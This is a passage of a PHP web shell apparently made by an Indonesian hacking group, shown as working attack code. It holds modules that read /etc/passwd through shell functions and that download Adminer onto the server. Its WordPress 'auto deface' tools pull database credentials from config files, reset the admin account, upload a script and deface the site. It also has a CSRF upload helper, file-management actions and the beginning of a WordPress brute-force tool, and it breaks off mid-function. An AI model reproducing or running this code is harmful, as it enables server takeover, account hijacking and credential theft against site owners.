  3493. } elseif($_GET['666'] == 'adminer') {
  3494.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  3495.     function adminer($url, $isi) {
  3496.         $fp = fopen($isi, "w");
  3497.         $ch = curl_init();
  3498.               curl_setopt($ch, CURLOPT_URL, $url);
  3499.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3500.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3501.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3502.               curl_setopt($ch, CURLOPT_FILE, $fp);
  3503.         return curl_exec($ch);
  3504.               curl_close($ch);
  3505.         fclose($fp);
  3506.         ob_flush();
  3507.         flush();
  3508.     }
  3509.     if(file_exists('adminer.php')) {
  3510.         echo "<center class='mybox'><font color=white><a href='$full/adminer.php' target='_blank'>-=[ ADMINER LOGIN ]=-</a></font></center>";
  3511.     } else {
  3512.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3513.             echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> ADMINER LOGIN <-</a></font></center>";
  3514.         } else {
  3515.             echo "<center><font color=red>Gagal buat file adminer, Jancok!</font></center>";
  3516.         }
  3517.     }
  3518. }elseif($_GET['666'] == 'passwbypass') {
  3519.     echo '<div class="mybox"><br><center>Bypass etc/passw With:<br>
  3520. <table style="width:50%">
  3521.   <tr>
  3522.     <td><form method="post"><input style="border-color=white;" class="kotak" type="submit" value="System Function" name="syst"></form></td>
  3523.     <td><form method="post"><input style="border-color=white;" class="kotak" type="submit" value="Passthru Function" name="passth"></form></td>
  3524.     <td><form method="post"><input style="border-color=white;" type="submit" class="kotak" value="Exec Function" name="ex"></form></td>  
  3525.     <td><form method="post"><input style="border-color=white;" type="submit" class="kotak" value="Shell_exec Function" name="shex"></form></td>      
  3526.     <td><form method="post"><input style="border-color=white;" type="submit" class="kotak" value="Posix_getpwuid Function" name="berandal"></form></td>
  3527. </tr></table>Bypass User With : <table style="width:50%">
  3528. <tr>
  3529.     <td><form method="post"><input style="border-color=white;" class="kotak" type="submit" value="Awk Program" name="awkuser"></form></td>
  3530.     <td><form method="post"><input style="border-color=white;" class="kotak" type="submit" value="System Function" name="systuser"></form></td>
  3531.     <td><form method="post"><input style="border-color=white;" class="kotak" type="submit" value="Passthru Function" name="passthuser"></form></td>  
  3532.     <td><form method="post"><input style="border-color=white;" class="kotak" type="submit" value="Exec Function" name="exuser"></form></td>      
  3533.     <td><form method="post"><input style="border-color=white;" class="kotak" type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  3534. </tr>
  3535. </table><br></div>';
  3536.  
  3537.  
  3538. if ($_POST['awkuser']) {
  3539. echo"<textarea class='inputzbut' style='border-color=white;' cols='65' rows='15'>";
  3540. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  3541. echo "</textarea><br>";
  3542. }
  3543. if ($_POST['systuser']) {
  3544. echo"<textarea class='inputzbut' style='border-color=white;' cols='65' rows='15'>";
  3545. echo system("ls /var/mail");
  3546. echo "</textarea><br>";
  3547. }
  3548. if ($_POST['passthuser']) {
  3549. echo"<textarea class='inputzbut' style='border-color=white;' cols='65' rows='15'>";
  3550. echo passthru("ls /var/mail");
  3551. echo "</textarea><br>";
  3552. }
  3553. if ($_POST['exuser']) {
  3554. echo"<textarea class='inputzbut' style='border-color=white;' cols='65' rows='15'>";
  3555. echo exec("ls /var/mail");
  3556. echo "</textarea><br>";
  3557. }
  3558. if ($_POST['shexuser']) {
  3559. echo"<textarea class='inputzbut' style='border-color=white;' cols='65' rows='15'>";
  3560. echo shell_exec("ls /var/mail");
  3561. echo "</textarea><br>";
  3562. }
  3563. if($_POST['syst'])
  3564. {
  3565. echo"<textarea class='inputz' style='border-color=white;' cols='65' rows='15'>";
  3566. echo system("cat /etc/passwd");
  3567. echo"</textarea><br><br><b></b><br>";
  3568. }
  3569. if($_POST['passth'])
  3570. {
  3571. echo"<textarea class='inputz' style='border-color=white;' cols='65' rows='15'>";
  3572. echo passthru("cat /etc/passwd");
  3573. echo"</textarea><br><br><b></b><br>";
  3574. }
  3575. if($_POST['ex'])
  3576. {
  3577. echo"<textarea class='inputz' style='border-color=white;' cols='65' rows='15'>";
  3578. echo exec("cat /etc/passwd");
  3579. echo"</textarea><br><br><b></b><br>";
  3580. }
  3581. if($_POST['shex'])
  3582. {
  3583. echo"<textarea class='inputz' style='border-color=white;' cols='65' rows='15'>";
  3584. echo shell_exec("cat /etc/passwd");
  3585. echo"</textarea><br><br><b></b><br>";
  3586. }
  3587. echo '<center>';
  3588. if($_POST['berandal'])
  3589. {
  3590. echo"<textarea class='inputz' style='border-color=white;' cols='65' rows='15'>";
  3591. for($uid=0;$uid<60000;$uid++){
  3592. $ara = posix_getpwuid($uid);
  3593. if (!empty($ara)) {
  3594. while (list ($key, $val) = each($ara)){
  3595. print "$val:";
  3596. }
  3597. print "\n";
  3598. }
  3599. }
  3600. echo"</textarea><br><br>";
  3601. }
  3602. //
  3603.  
  3604. //
  3605. } elseif($_GET['666'] == 'auto_dwp') {
  3606.     if($_POST['auto_deface_wp']) {
  3607.         function anucurl($sites) {
  3608.             $ch = curl_init($sites);
  3609.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3610.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3611.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3612.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3613.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3614.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3615.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3616.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3617.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3618.             $data = curl_exec($ch);
  3619.                   curl_close($ch);
  3620.             return $data;
  3621.         }
  3622.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3623.             $post = array(
  3624.                    "log" => "$userr",
  3625.                    "pwd" => "$pass",
  3626.                    "rememberme" => "forever",
  3627.                    "wp-submit" => "$wp_submit",
  3628.                    "redirect_to" => "$web",
  3629.                    "testcookie" => "1",
  3630.                    );
  3631.             $ch = curl_init($cek);
  3632.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3633.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3634.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3635.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3636.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3637.                   curl_setopt($ch, CURLOPT_POST, 1);
  3638.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3639.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3640.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3641.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3642.             $data = curl_exec($ch);
  3643.                   curl_close($ch);
  3644.             return $data;
  3645.         }
  3646.         $scan = $_POST['link_config'];
  3647.         $link_config = scandir($scan);
  3648.         $script = htmlspecialchars($_POST['script']);
  3649.         $user = "Berandal";
  3650.         $pass = "Berandal";
  3651.         $passx = md5($pass);
  3652.         foreach($link_config as $dir_config) {
  3653.             if(!is_file("$scan/$dir_config")) continue;
  3654.             $config = file_get_contents("$scan/$dir_config");
  3655.             if(preg_match("/WordPress/", $config)) {
  3656.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3657.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3658.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3659.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3660.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3661.                 $prefix = $dbprefix."users";
  3662.                 $option = $dbprefix."options";
  3663.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3664.                 $db = mysql_select_db($dbname);
  3665.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3666.                 $result = mysql_fetch_array($q);
  3667.                 $id = $result[ID];
  3668.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3669.                 $result2 = mysql_fetch_array($q2);
  3670.                 $target = $result2[option_value];
  3671.                 if($target == '') {                
  3672.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya cok !!</font><br>";
  3673.                 } else {
  3674.                     echo "[+] $target <br>";
  3675.                 }
  3676.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3677.                 if(!$conn OR !$db OR !$update) {
  3678.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3679.                     mysql_close($conn);
  3680.                 } else {
  3681.                     $site = "$target/wp-login.php";
  3682.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  3683.                     $b1 = anucurl($site2);
  3684.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3685.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3686.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3687.                     $upload3 = base64_decode("YmVyYW5kYWxfdGFtdmFuIDpQ");
  3688.                     $www = "m.php";
  3689.                     $fp5 = fopen($www,"w");
  3690.                     fputs($fp5,$upload3);
  3691.                     $post2 = array(
  3692.                             "_wpnonce" => "$anu2",
  3693.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3694.                             "themezip" => "@$www",
  3695.                             "install-theme-submit" => "Install Now",
  3696.                             );
  3697.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3698.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3699.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3700.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3701.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3702.                           curl_setopt($ch, CURLOPT_POST, 1);
  3703.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3704.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3705.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3706.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3707.                     $data3 = curl_exec($ch);
  3708.                           curl_close($ch);
  3709.                     $y = date("Y");
  3710.                     $m = date("m");
  3711.                     $namafile = "id.php";
  3712.                     $fpi = fopen($namafile,"w");
  3713.                     fputs($fpi,$script);
  3714.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3715.                            curl_setopt($ch6, CURLOPT_POST, true);
  3716.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3717.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3718.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3719.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3720.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  3721.                     $postResult = curl_exec($ch6);
  3722.                            curl_close($ch6);
  3723.                     $as = "$target/k.php";
  3724.                     $bs = anucurl($as);
  3725.                     if(preg_match("#$script#is", $bs)) {
  3726.                         echo "[+] <font color='white'>Sukse Mass, Jancok!</font><br>";
  3727.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3728.                         } else {
  3729.                         echo "[-] <font color='red'>Gagal Mass, Asu!</font><br>";
  3730.                         echo "[!!] coba aja manual: <br>";
  3731.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3732.                         echo "[+] username: <font color=white>$user</font><br>";
  3733.                         echo "[+] password: <font color=white>$pass</font><br><br>";    
  3734.                         }
  3735.                     mysql_close($conn);
  3736.                 }
  3737.             }
  3738.         }
  3739.     } else {
  3740.         echo "<center class='mybox'><h1>WordPress Auto Deface</h1><hr color='white'><br>
  3741.         <form method='post'>
  3742.         <input type='text' style='border-color=white;' name='link_config' size='50' height='10' value='$dir'><br><br>
  3743.         <input type='text' style='border-color=white;' name='script' height='10' size='50' placeholder='CYBERSCRYTECH_ IN HERE ^_^' required><br><br>
  3744.         <input type='submit' style='width: 60px; text-align:center; border-color=white' name='auto_deface_wp' class='kotak' value='SIKAT!'><br>
  3745.         </form>
  3746.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/os_config )</span>
  3747.         </center>";
  3748.     }
  3749. } elseif($_GET['666'] == 'auto_dwp2') {
  3750.     if($_POST['auto_deface_wp']) {
  3751.         function anucurl($sites) {
  3752.             $ch = curl_init($sites);
  3753.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3754.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3755.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3756.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3757.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3758.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3759.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3760.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3761.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  3762.             $data = curl_exec($ch);
  3763.                   curl_close($ch);
  3764.             return $data;
  3765.         }
  3766.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3767.             $post = array(
  3768.                    "log" => "$userr",
  3769.                    "pwd" => "$pass",
  3770.                    "rememberme" => "forever",
  3771.                    "wp-submit" => "$wp_submit",
  3772.                    "redirect_to" => "$web",
  3773.                    "testcookie" => "1",
  3774.                    );
  3775.             $ch = curl_init($cek);
  3776.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3777.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3778.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3779.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3780.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3781.                   curl_setopt($ch, CURLOPT_POST, 1);
  3782.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3783.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3784.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3785.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3786.             $data = curl_exec($ch);
  3787.                   curl_close($ch);
  3788.             return $data;
  3789.         }
  3790.         $link = explode("\r\n", $_POST['link']);
  3791.         $script = htmlspecialchars($_POST['script']);
  3792.         $user = "berandal";
  3793.         $pass = "berandal";
  3794.         $passx = md5($pass);
  3795.         foreach($link as $dir_config) {
  3796.             $config = anucurl($dir_config);
  3797.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  3798.             $dbuser = ambilkata($config,"DB_USER', '","'");
  3799.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3800.             $dbname = ambilkata($config,"DB_NAME', '","'");
  3801.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3802.             $prefix = $dbprefix."users";
  3803.             $option = $dbprefix."options";
  3804.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3805.             $db = mysql_select_db($dbname);
  3806.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3807.             $result = mysql_fetch_array($q);
  3808.             $id = $result[ID];
  3809.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3810.             $result2 = mysql_fetch_array($q2);
  3811.             $target = $result2[option_value];
  3812.             if($target == '') {                
  3813.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya cok !!</font><br>";
  3814.             } else {
  3815.                 echo "[+] $target <br>";
  3816.             }
  3817.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3818.             if(!$conn OR !$db OR !$update) {
  3819.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3820.                 mysql_close($conn);
  3821.             } else {
  3822.                 $site = "$target/wp-login.php";
  3823.                 $site2 = "$target/wp-admin/theme-install.php?upload";
  3824.                 $b1 = anucurl($site2);
  3825.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3826.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3827.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3828.                 $upload3 = base64_decode("YmVyYW5kYWxfdGFtdmFuIDpQ");
  3829.                 $www = "m.php";
  3830.                 $fp5 = fopen($www,"w");
  3831.                 fputs($fp5,$upload3);
  3832.                 $post2 = array(
  3833.                         "_wpnonce" => "$anu2",
  3834.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3835.                         "themezip" => "@$www",
  3836.                         "install-theme-submit" => "Install Now",
  3837.                         );
  3838.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3839.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3840.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3841.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3842.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3843.                       curl_setopt($ch, CURLOPT_POST, 1);
  3844.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3845.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3846.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3847.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3848.                 $data3 = curl_exec($ch);
  3849.                       curl_close($ch);
  3850.                 $y = date("Y");
  3851.                 $m = date("m");
  3852.                 $namafile = "os.php";
  3853.                 $fpi = fopen($namafile,"w");
  3854.                 fputs($fpi,$script);
  3855.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3856.                        curl_setopt($ch6, CURLOPT_POST, true);
  3857.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3858.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3859.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3860.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3861.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  3862.                 $postResult = curl_exec($ch6);
  3863.                        curl_close($ch6);
  3864.                 $as = "$target/as.php";
  3865.                 $bs = anucurl($as);
  3866.                 if(preg_match("#$script#is", $bs)) {
  3867.                     echo "[+] <font color='white'>Sukses mepes, COK!</font><br>";
  3868.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3869.                     } else {
  3870.                     echo "[-] <font color='red'>gagal mepes cok!!</font><br>";
  3871.                     echo "[!!] coba aja manual: <br>";
  3872.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3873.                     echo "[+] username: <font color=white>$user</font><br>";
  3874.                     echo "[+] password: <font color=white>$pass</font><br><br>";    
  3875.                     }
  3876.                 mysql_close($conn);
  3877.             }
  3878.         }
  3879.     } else {
  3880.         echo "<center class='mybox'><h1>WordPress Auto Deface V.2</h1><hr color='white'><br>
  3881.         <form method='post'>
  3882.         Link Config: <br>
  3883.         <textarea name='link' style='border-color=white;' placeholder='http://target.com/os_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br><br>
  3884.         <input type='text' style='border-color=white;' name='script' height='10' size='60' placeholder='CYBERSCRYTECH_ IN HERE ^_^' required><br><br>
  3885.         <input type='submit' style='width: 450px; border-color=white' name='auto_deface_wp' class='kotak' value='SIKAT!'>
  3886.         </form></center>";
  3887.     }
  3888. }
  3889. elseif($_GET['act'] == 'newfile') {
  3890.     if($_POST['new_save_file']) {
  3891.         $newfile = htmlspecialchars($_POST['newfile']);
  3892.         $fopen = fopen($newfile, "a+");
  3893.         if($fopen) {
  3894.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  3895.         } else {
  3896.             $act = "<font color=red>Gak dibolehin, Jancok!</font>";
  3897.         }
  3898.     }
  3899.     echo $act;
  3900.     echo "<form method='post'><h1>New File</h1>
  3901.     Filename: <input type='text' name='newfile' value='$dir/asu.php' style='width: 450px; border-color=white' height='10'>
  3902.     <input type='submit' name='new_save_file' style='border-color=white' class='kotak' value='SIKAT!'>
  3903.     </form>";
  3904. } elseif($_GET['act'] == 'newfolder') {
  3905.     if($_POST['new_save_folder']) {
  3906.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  3907.         if(!mkdir($new_folder)) {
  3908.             $act = "<font color=red>Gak dibolehin, Jancok!</font>";
  3909.         } else {
  3910.             $act = "<script>window.location='?dir=".$dir."';</script>";
  3911.         }
  3912.     }
  3913.     echo $act;
  3914.     echo "<form method='post'><h1>New Dir</h1>
  3915.     Folder Name: <input type='text' name='newfolder' style='width: 450px; border-color=white' height='10'>
  3916.     <input type='submit' name='new_save_folder' style='border-color=white' class='kotak' value='SIKAT!'>
  3917.     </form>";
  3918. } elseif($_GET['act'] == 'rename_dir') {
  3919.     if($_POST['dir_rename']) {
  3920.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  3921.         if($dir_rename) {
  3922.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  3923.         } else {
  3924.             $act = "<font color=red>Gak dibolehin, Jancok!</font>";
  3925.         }
  3926.     echo "".$act."<br>";
  3927.     }
  3928.     echo "<form method='post'><h1>Rename Dir</h1>
  3929.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px; border-color=white' height='10'>
  3930.     <input type='submit' class='kotak' style='border-color=white' name='dir_rename' value='rename'>
  3931.     </form>";
  3932. } elseif($_GET['act'] == 'delete_dir') {
  3933.     function Delete($path)
  3934. {
  3935.     if (is_dir($path) === true)
  3936.     {
  3937.         $files = array_diff(scandir($path), array('.', '..'));
  3938.         foreach ($files as $file)
  3939.         {
  3940.             Delete(realpath($path) . '/' . $file);
  3941.         }
  3942.         return rmdir($path);
  3943.     }
  3944.     else if (is_file($path) === true)
  3945.     {
  3946.         return unlink($path);
  3947.     }
  3948.     return false;
  3949. }
  3950.     $delete_dir = Delete($dir);
  3951.     if($delete_dir) {
  3952.         $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  3953.     } else {
  3954.         $act = "<font color=red>Gabisa dihapus nih :( ".basename($dir)."</font>";
  3955.     }
  3956.     echo $act;
  3957. } elseif($_GET['act'] == 'view') {
  3958.     echo "<br>Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>View</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>Edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>Rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>Hapus</a> ]<br><br>";
  3959.     echo "<textarea style='border-color=white' readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br><br>";
  3960. } elseif($_GET['act'] == 'edit') {
  3961.     if($_POST['save']) {
  3962.         $save = file_put_contents($_GET['file'], $_POST['src']);
  3963.         if($save) {
  3964.             $act = "<font color=white>Saved!</font>";
  3965.         } else {
  3966.             $act = "<font color=red>Gak dibolehin :'(</font>";
  3967.         }
  3968.     echo "".$act."<br>";
  3969.     }
  3970.     echo "<br>Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>View</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>Edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>Rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>Hapus</a> ]<br><br>";
  3971.     echo "<form method='post'>
  3972.     <textarea style='border-color=white' name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br><br>
  3973.     <input type='submit' class='kotak' value='Simpan' name='save' style='border-color=white'>
  3974.     </form>";
  3975. } elseif($_GET['act'] == 'rename') {
  3976.     if($_POST['do_rename']) {
  3977.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  3978.         if($rename) {
  3979.             $act = "<script>window.location='?dir=".$dir."';</script>";
  3980.         } else {
  3981.             $act = "<font color=red>Gak dibolehin, Jancok!</font>";
  3982.         }
  3983.     echo "".$act."<br>";
  3984.     }
  3985.     echo "<h1>Rename</h1>";
  3986.     echo "<br>Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>View</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>Edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>Hapus</a> ]<br><br><br>";
  3987.     echo "<form method='post'>
  3988.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px; border-color=white' height='10'>
  3989.     <input type='submit' class='kotak' style='border-color=white' name='do_rename' value='Rename'>
  3990.     </form><br>";
  3991. }
  3992. elseif($_GET['666'] == 'csrf') {
  3993.     echo "<div style='text-align: left;' class='mybox'>
  3994.     <h1>CSRF Exploiter Online</h1><hr color='white'>
  3995.     <form method='post'>
  3996. URL: &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='url' size='50' height='10' placeholder='http://127.0.0.1/[path]/upload.php' style='margin: 5px auto; padding-left: 5px;' required><br>
  3997. POST File: <input type='text' name='data' style='border:0;border-bottom:1px solid #292929; width:500px;' size='50' height='10' placeholder='Filedata / files[] / qqfile / userfile / dll' style='margin: 5px auto; padding-left: 5px;' required><br>
  3998. <br><input style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' class='kotak' type='submit' name='go' value='Lock!'>
  3999. </form></div>";
  4000. $url = $_POST['url'];
  4001. $data = $_POST['data'];
  4002. $submit = $_POST['go'];
  4003. if($submit) {
  4004.     echo "<br><form style='text-align:left' method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$data'><input style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' type='submit' name='ok' class='kotak' value='Upload'>
  4005.     </form></div>";
  4006. }
  4007.  
  4008.     ;}
  4009. elseif($_GET['666'] == 'about') {
  4010.     echo "<link href='http://fonts.googleapis.com/css?family=Iceberg' rel='stylesheet' type='text/css'>";
  4011.     echo '<Center style="color:white">
  4012.         <font size="5pt" face="Iceberg"><font color="red" face="Iceberg">~</font> GREETZ <font color="red">~</font></font><br><font size="4pt">Berandal OWL SQUAD</font><br><br>and<br><br>
  4013.         <font size="4pt" face="Iceberg"><font color="red" face="Iceberg">[</font><marquee width="40%">T1KUS90T - EXI2T Cyber Team - Alone Clown Security - Hacker Patah Hati - BerdendangC0de - IndoXploit Coders Team - Xai Syndicate</marquee><font color="red">]</font></font>
  4014.         </center>
  4015. <br><br>Special Thanks :<br><a href="http://indoxploit.or.id" target="blank">IndoXploit Coders Team</a> - <a href="" target="blank">Con7ext [Xai Syndicate]</a>
  4016. </font>
  4017. ';
  4018. echo "<hr color='white'>";
  4019. echo "Find us: <a href='https://facebook.com/cybers.cry' target='blank'>Fanpage Facebook</a> - <a href='https://facebook.com/groups/owlsquadtoday' target='blank'>Group Facebook</a>";
  4020. }
  4021. elseif($_GET['666'] == 'wpbrute') {
  4022.     set_time_limit(0);
  4023. error_reporting(0);
  4024. class berandal{
  4025.         private $host;
  4026.         private $user;
  4027.         private $open;
  4028.         private $list;
  4029. public function banner() {
  4030.    echo "<div class='mybox' style='text-align:left'>
  4031.     <h1>WordPress Brute Force</h1><hr color='white'>
  4032.     <form action='' method='POST'>
  4033.     Host<input type='text' name='host' style='border:0;border-bottom:1px solid #292929; width:500px;' placeholder='http://127.0.0.1/' size='40'><br><br>
  4034.     User<input type='text' name='user' style='border:0;border-bottom:1px solid #292929; width:500px;' value='admin' size='25'><br><br>
  4035.     Wordlist:
  4036.     <textarea class='mybox' rows='10' style='border-color:#292929;' name='list'></textarea><br>Need more? <a href='http://pastebin.com/u/berandal666' target='blank'>Click here</a>.<br>
  4037.     <input type='Submit' class='kotak' style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' value='Start'>
  4038.     </form></div>
  4039.     ";
  4040.  
  4041. }
  4042.  
  4043.     public function extract_post() {
  4044.          $this->host = $_POST["host"];
